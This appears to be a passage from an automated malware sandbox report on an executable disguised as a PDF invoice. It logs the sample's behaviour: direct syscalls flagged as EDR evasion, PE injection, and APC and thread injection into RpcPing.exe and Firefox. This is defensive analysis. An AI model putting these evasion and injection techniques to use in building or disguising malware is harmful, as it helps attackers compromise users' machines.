            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC4B4B mov eax, dword ptr fs:[00000030h]3_2_01AC4B4B
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC4B4B mov eax, dword ptr fs:[00000030h]3_2_01AC4B4B
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AB8B42 mov eax, dword ptr fs:[00000030h]3_2_01AB8B42
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA6B40 mov eax, dword ptr fs:[00000030h]3_2_01AA6B40
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA6B40 mov eax, dword ptr fs:[00000030h]3_2_01AA6B40
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ADAB40 mov eax, dword ptr fs:[00000030h]3_2_01ADAB40
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A08B50 mov eax, dword ptr fs:[00000030h]3_2_01A08B50
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE2B57 mov eax, dword ptr fs:[00000030h]3_2_01AE2B57
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE2B57 mov eax, dword ptr fs:[00000030h]3_2_01AE2B57
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE2B57 mov eax, dword ptr fs:[00000030h]3_2_01AE2B57
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE2B57 mov eax, dword ptr fs:[00000030h]3_2_01AE2B57
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABEB50 mov eax, dword ptr fs:[00000030h]3_2_01ABEB50
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A18AA0 mov eax, dword ptr fs:[00000030h]3_2_01A18AA0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A18AA0 mov eax, dword ptr fs:[00000030h]3_2_01A18AA0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A66AA4 mov eax, dword ptr fs:[00000030h]3_2_01A66AA4
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1EA80 mov eax, dword ptr fs:[00000030h]3_2_01A1EA80
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1EA80 mov eax, dword ptr fs:[00000030h]3_2_01A1EA80
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1EA80 mov eax, dword ptr fs:[00000030h]3_2_01A1EA80
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1EA80 mov eax, dword ptr fs:[00000030h]3_2_01A1EA80
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1EA80 mov eax, dword ptr fs:[00000030h]3_2_01A1EA80
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1EA80 mov eax, dword ptr fs:[00000030h]3_2_01A1EA80
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1EA80 mov eax, dword ptr fs:[00000030h]3_2_01A1EA80
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1EA80 mov eax, dword ptr fs:[00000030h]3_2_01A1EA80
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1EA80 mov eax, dword ptr fs:[00000030h]3_2_01A1EA80
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE4A80 mov eax, dword ptr fs:[00000030h]3_2_01AE4A80
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A48A90 mov edx, dword ptr fs:[00000030h]3_2_01A48A90
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4AAEE mov eax, dword ptr fs:[00000030h]3_2_01A4AAEE
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4AAEE mov eax, dword ptr fs:[00000030h]3_2_01A4AAEE
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A66ACC mov eax, dword ptr fs:[00000030h]3_2_01A66ACC
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A66ACC mov eax, dword ptr fs:[00000030h]3_2_01A66ACC
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A66ACC mov eax, dword ptr fs:[00000030h]3_2_01A66ACC
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A10AD0 mov eax, dword ptr fs:[00000030h]3_2_01A10AD0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A44AD0 mov eax, dword ptr fs:[00000030h]3_2_01A44AD0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A44AD0 mov eax, dword ptr fs:[00000030h]3_2_01A44AD0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4CA24 mov eax, dword ptr fs:[00000030h]3_2_01A4CA24
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3EA2E mov eax, dword ptr fs:[00000030h]3_2_01A3EA2E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A34A35 mov eax, dword ptr fs:[00000030h]3_2_01A34A35
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A34A35 mov eax, dword ptr fs:[00000030h]3_2_01A34A35
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9CA11 mov eax, dword ptr fs:[00000030h]3_2_01A9CA11
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4CA6F mov eax, dword ptr fs:[00000030h]3_2_01A4CA6F
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4CA6F mov eax, dword ptr fs:[00000030h]3_2_01A4CA6F
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4CA6F mov eax, dword ptr fs:[00000030h]3_2_01A4CA6F
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABEA60 mov eax, dword ptr fs:[00000030h]3_2_01ABEA60
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8CA72 mov eax, dword ptr fs:[00000030h]3_2_01A8CA72
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8CA72 mov eax, dword ptr fs:[00000030h]3_2_01A8CA72
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeMemory written: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeSection loaded: NULL target: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeSection loaded: NULL target: C:\Windows\SysWOW64\RpcPing.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: NULL target: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: NULL target: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\RpcPing.exeThread register set: target process: 8104Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\RpcPing.exeThread APC queued: target process: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"Jump to behavior
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeProcess created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: fFUkGixTNm.exe, 00000007.00000000.2156839623.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930421120.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000009.00000002.2930653100.0000000001A20000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: fFUkGixTNm.exe, 00000007.00000000.2156839623.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930421120.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000009.00000002.2930653100.0000000001A20000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: fFUkGixTNm.exe, 00000007.00000000.2156839623.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930421120.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000009.00000002.2930653100.0000000001A20000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: fFUkGixTNm.exe, 00000007.00000000.2156839623.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930421120.0000000001560000.00000002.00000001.00040000.00000000.sdmp, fFUkGixTNm.exe, 00000009.00000002.2930653100.0000000001A20000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
